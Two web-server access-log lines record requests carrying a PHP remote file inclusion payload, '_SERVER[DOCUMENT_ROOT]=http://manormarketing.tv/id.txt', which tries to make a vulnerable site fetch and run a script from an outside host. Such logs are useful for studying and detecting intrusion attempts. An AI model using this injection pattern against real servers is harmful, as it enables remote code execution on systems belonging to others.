199.71.213.177 - - [17/Jan/2010:01:45:54 -0500] "GET /logs/access_log.Q109102300%20%20////?_SERVER[DOCUMENT_ROOT]=http://manormarketing.tv/id.txt??? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
199.71.213.177 - - [17/Jan/2010:01:45:54 -0500] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://manormarketing.tv/id.txt??? HTTP/1.1" 200 34523 "-" "Mozilla/5.0"
